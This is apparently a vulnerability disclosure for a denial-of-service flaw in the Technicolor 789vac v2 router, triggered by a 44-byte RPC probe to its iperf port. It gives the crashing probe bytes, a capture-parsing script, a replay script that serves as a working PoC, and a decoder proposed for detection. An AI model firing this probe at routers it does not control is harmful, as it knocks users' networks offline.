KaiserSource@home:~$

Router Technicolor 789vac v2

Affected products

We have not yet tested Technicolor models other than the one listed below. However, we suspect the issue may also affect other models running a similar firmware at a version higher than 2.0.0.

    Technicolor 789vac v2

Overview

An issue was discovered in the Technicolor 789vac v2 router running firmware AGTOT 2.2.3. An unauthenticated remote attacker can send a single crafted probe, or simply run a service detection scan, against the iperf service listening on TCP port 5001. This triggers an immediate failure of the router's network stack: all connectivity (wired and wireless) is lost and the router ends up rebooting.

The PoC therefore results in a denial of service (DoS).

Given the vendor's policies, we won't show the source code of the binary scripts. However, we'll inspect the web page source, and we'll provide our insights before and after the procedure.

Strategy

We reproduced the faulty behaviour while capturing all the traffic exchanged with the router, and saved the capture in PCAPNG format for later analysis. From the capture we extracted every distinct probe sent to port 5001 (with Scapy, see the scraping script below), replayed the probes one by one to pin down the single one that causes the crash, and finally crafted the exploit around it.

Here’s the list of the probes collected:

Probe #1: b'\x01\x00\x00\xfd\xce\xfa\x0b\xb0\xa0\x00\x00\x00MMS\x14\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x12\x00\x00\x00\x01\x00\x03\x00\xf0\xf0\xf0\xf0\x0b\x00\x04\x00\x1c\x00\x03\x00N\x00S\x00P\x00l\x00a\x00y\x00e\x00r\x00/\x009\x00.\x000\x00.\x000\x00.\x002\x009\x008\x000\x00;\x00 \x00{\x000\x000\x000\x000\x00A\x00A\x000\x000\x00-\x000\x00A\x000\x000\x00-\x000\x000\x00a\x000\x00-\x00A\x00A\x000\x00A\x00-\x000\x000\x000\x000\x00A\x000\x00A\x00A\x000\x00A\x00A\x000\x00}\x00\x00\x00\xe0m\xdf_'
Probe #2: b'\x00\x00\x00\x1f\x00\x00\x00\x00\x00\x00\x00\x0cGetClassName\x00\x00\x00\x02\x04\x00\x00\x00\x00\x01\x00'
Probe #3: b'\r\n\r\n'
Probe #4: b'GET / HTTP/1.0\r\n\r\n'
Probe #5: b'OPTIONS / HTTP/1.0\r\n\r\n'
Probe #6: b'OPTIONS / RTSP/1.0\r\n\r\n'
Probe #7: b'\x80\x00\x00(r\xfe\x1d\x13\x00\x00\x00\x00\x00\x00\x00\x02\x00\x01\x86\xa0\x00\x01\x97|\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'
Probe #8: b'\x00\x1e\x00\x06\x01\x00\x00\x01\x00\x00\x00\x00\x00\x00\x07version\x04bind\x00\x00\x10\x00\x03'
Probe #9: b'\x00\x0c\x00\x00\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00'
Probe #10: b'HELP\r\n'
Probe #11: b'\x16\x03\x00\x00S\x01\x00\x00O\x03\x00?G\xd7\xf7\xba,\xee\xea\xb2`~\xf3\x00\xfd\x82{\xb9\xd5\x96\xc8w\x9b\xe6\xc4\xdb<=\xdbo\xef\x10n\x00\x00(\x00\x16\x00\x13\x00\n\x00f\x00\x05\x00\x04\x00e\x00d\x00c\x00b\x00a\x00`\x00\x15\x00\x12\x00\t\x00\x14\x00\x11\x00\x08\x00\x06\x00\x03\x01\x00'

Probe scraping:

from scapy.all import rdpcap


file_path = 'crash.pcapng'  # Replace with your file path
packets = rdpcap(file_path)

target_ip = "ip_addr"  # Replace with the router's LAN address (192.168.1.1 in the ping output below)
target_port = 5001     # iperf

# Collect every distinct, non-empty TCP payload sent *to* the iperf port, in
# first-seen order, so that each probe can later be replayed on its own.
probes = []
for packet in packets:
    # Check for the IP layer too: indexing packet["IP"] on a non-IPv4 frame raises
    if not (packet.haslayer("IP") and packet.haslayer("TCP")):
        continue
    if packet["IP"].dst != target_ip or packet["TCP"].dport != target_port:
        continue
    payload = bytes(packet["TCP"].payload)
    if payload and payload not in probes:
        probes.append(payload)

for i, probe in enumerate(probes, start=1):
    print(f"Probe #{i}: {probe}")
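The "send them one by one" step of the strategy above, written out as an added example (this is not the page's own tooling): each probe is delivered over a fresh TCP connection to port 5001, the target is given a few seconds to settle, and a reachability check decides whether that probe was the one that took the router down. The probe list here is a constructed subset of the probes listed above, so the index it reports is a position in this list rather than the page's "Probe #N" numbering; the target address 192.168.1.1 is taken from the ping output on this page, and using the router's web UI port 80 as the liveness check is an assumption that avoids needing raw ICMP sockets. With a single-element list containing only probe #7 this is the whole PoC.

```python
import socket
import time

# Constructed subset of the probes listed on this page, in the order they were
# sent by the scanner (the full list comes from the scraping script above).
PROBES = [
    b'\r\n\r\n',
    b'GET / HTTP/1.0\r\n\r\n',
    b'OPTIONS / HTTP/1.0\r\n\r\n',
    # Probe #7 on this page: the 44-byte ONC RPC NULL call
    b'\x80\x00\x00(r\xfe\x1d\x13\x00\x00\x00\x00\x00\x00\x00\x02\x00\x01\x86\xa0'
    b'\x00\x01\x97|\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'
    b'\x00\x00\x00\x00',
    b'HELP\r\n',
]


def tcp_send(host, port, payload, timeout=3.0):
    """Deliver one probe over a fresh TCP connection, the way a scanner does."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(payload)
        try:
            s.recv(1024)  # drain whatever the service answers, if anything
        except OSError:
            pass          # timeout or reset: we only care about delivery


def tcp_alive(host, port, timeout=2.0):
    """Liveness check: can we still complete a TCP handshake with the target?
    The port is assumed to be the router's web UI (80); adjust if it differs."""
    try:
        with socket.create_connection((host, port), timeout=timeout):
            return True
    except OSError:
        return False


def find_crashing_probe(probes, send, alive, settle=5.0, sleep=time.sleep):
    """Replay `probes` one at a time and return the 1-based index of the first
    probe after which the target stops answering, or None if all are survived.
    `send(payload)` delivers a probe and `alive()` reports whether the target
    still responds; both are injected so the logic runs without a router."""
    if not alive():
        raise RuntimeError("target not reachable before replay; aborting")
    for idx, payload in enumerate(probes, start=1):
        try:
            send(payload)
        except OSError:
            # A refused or reset connection already hints at trouble; fall
            # through to the liveness check to confirm rather than guess.
            pass
        sleep(settle)  # give the stack time to fall over before checking
        if not alive():
            return idx
    return None


if __name__ == "__main__":
    TARGET = "192.168.1.1"  # router LAN address from the ping output on this page
    crash_at = find_crashing_probe(
        PROBES,
        send=lambda p: tcp_send(TARGET, 5001, p),
        alive=lambda: tcp_alive(TARGET, 80),
    )
    if crash_at is None:
        print("no probe caused an outage")
    else:
        print(f"probe at position {crash_at} took the target down")
```

Keep the settle time generous: the page reports that the outage is immediate but the reboot that follows takes anything from seconds to minutes, so a too-short delay can blame the wrong probe, and once the router is down there is nothing to gain from sending the rest of the list.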

Probe #7 (the 44-byte ONC RPC NULL call that Nmap's RPCCheck service-detection probe sends) is the one that brings the Technicolor 789vac down: the router becomes unreachable on every service. In the ping below the router (192.168.1.1) answers normally until the probe is sent, after which the pinging host (192.168.1.2) reports it as unreachable:

64 bytes from 192.168.1.1: icmp_seq=183 ttl=64 time=0.401 ms
64 bytes from 192.168.1.1: icmp_seq=184 ttl=64 time=0.348 ms
64 bytes from 192.168.1.1: icmp_seq=185 ttl=64 time=0.384 ms
64 bytes from 192.168.1.1: icmp_seq=186 ttl=64 time=0.373 ms
64 bytes from 192.168.1.1: icmp_seq=187 ttl=64 time=0.335 ms
64 bytes from 192.168.1.1: icmp_seq=188 ttl=64 time=0.349 ms
64 bytes from 192.168.1.1: icmp_seq=189 ttl=64 time=4.66 ms
64 bytes from 192.168.1.1: icmp_seq=190 ttl=64 time=0.518 ms
64 bytes from 192.168.1.1: icmp_seq=191 ttl=64 time=0.385 ms
64 bytes from 192.168.1.1: icmp_seq=192 ttl=64 time=0.418 ms



From 192.168.1.2 icmp_seq=247 Destination Host Unreachable
From 192.168.1.2 icmp_seq=248 Destination Host Unreachable
From 192.168.1.2 icmp_seq=249 Destination Host Unreachable

Moreover, the crash is followed by an unintended reboot of the router. The time it takes to come back is unpredictable, ranging from a few seconds up to about 10 minutes after the probe was sent.
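What probe #7 actually carries: the 44 bytes are the RPCCheck probe from Nmap's service-detection database, a TCP-framed ONC RPC NULL call to the portmapper program (100000) with a deliberately impossible version number, which a genuine RPC server answers with PROG_MISMATCH and its supported version range. The decoder below is an added example, not the page's code and not anything taken from the router's firmware; it parses the record mark and the call header as laid out in RFC 5531 and rejects anything malformed, which is the treatment an unrelated service such as iperf should give to bytes it does not understand. The page does not establish the root cause inside iperf, so the decoder only shows what reaches the service, not why it crashes.

```python
import struct

RPC_CALL = 0            # msg_type value for a call (RFC 5531)
PORTMAP_PROG = 100000   # the portmapper / rpcbind program number
MAX_AUTH_BYTES = 400    # RFC 5531 limit on an opaque_auth body

# Probe #7 from this page, split along its field boundaries (same bytes).
PROBE_7 = (
    b'\x80\x00\x00('                      # record mark: last fragment, 40 bytes follow
    b'r\xfe\x1d\x13'                      # xid
    b'\x00\x00\x00\x00'                   # msg_type = CALL
    b'\x00\x00\x00\x02'                   # rpcvers = 2
    b'\x00\x01\x86\xa0'                   # prog = 100000 (portmapper)
    b'\x00\x01\x97|'                      # vers = 104316 (deliberately bogus)
    b'\x00\x00\x00\x00'                   # proc = 0 (NULL procedure)
    b'\x00\x00\x00\x00\x00\x00\x00\x00'   # cred: flavor AUTH_NULL, length 0
    b'\x00\x00\x00\x00\x00\x00\x00\x00'   # verf: flavor AUTH_NULL, length 0
)


def parse_rpc_call(data):
    """Decode one TCP-framed ONC RPC CALL (record marking + call body).
    Returns the header fields as a dict, or raises ValueError when the bytes
    are not a well-formed call; a non-RPC service should just drop such input."""
    if len(data) < 4:
        raise ValueError("short record mark")
    (mark,) = struct.unpack("!I", data[:4])
    last_fragment = bool(mark & 0x80000000)
    frag_len = mark & 0x7FFFFFFF
    body = data[4:]
    if len(body) != frag_len:
        raise ValueError(f"record mark says {frag_len} bytes, got {len(body)}")
    if frag_len < 24:
        raise ValueError("fragment too short for an RPC call header")
    xid, msg_type, rpcvers, prog, vers, proc = struct.unpack("!6I", body[:24])
    if msg_type != RPC_CALL:
        raise ValueError(f"msg_type {msg_type} is not CALL")
    if rpcvers != 2:
        raise ValueError(f"unsupported RPC version {rpcvers}")
    off = 24
    auths = {}
    for name in ("cred", "verf"):          # two opaque_auth structures follow
        if off + 8 > frag_len:
            raise ValueError(f"truncated {name}")
        flavor, length = struct.unpack("!II", body[off:off + 8])
        off += 8
        if length > MAX_AUTH_BYTES or off + length > frag_len:
            raise ValueError(f"{name} body length {length} out of bounds")
        auths[name] = (flavor, body[off:off + length])
        off += (length + 3) & ~3           # XDR pads opaque data to 4 bytes
    return {
        "last_fragment": last_fragment,
        "xid": xid,
        "prog": prog,
        "vers": vers,
        "proc": proc,
        "cred": auths["cred"],
        "verf": auths["verf"],
        "trailing": body[off:],            # procedure arguments, if any
    }


def describe(fields):
    """One-line human summary of a parsed call header."""
    prog = "portmapper" if fields["prog"] == PORTMAP_PROG else f"prog {fields['prog']}"
    proc = "NULL" if fields["proc"] == 0 else str(fields["proc"])
    return f"RPC CALL xid=0x{fields['xid']:08x} {prog} v{fields['vers']} proc {proc}"


if __name__ == "__main__":
    print(describe(parse_rpc_call(PROBE_7)))
```

Nothing in the probe is exotic: it is a NULL call with no credentials and no arguments. A service that is not speaking RPC has no business interpreting it at all, which makes the 44 bytes a useful minimal reproducer and a convenient signature for a detection rule on traffic to port 5001.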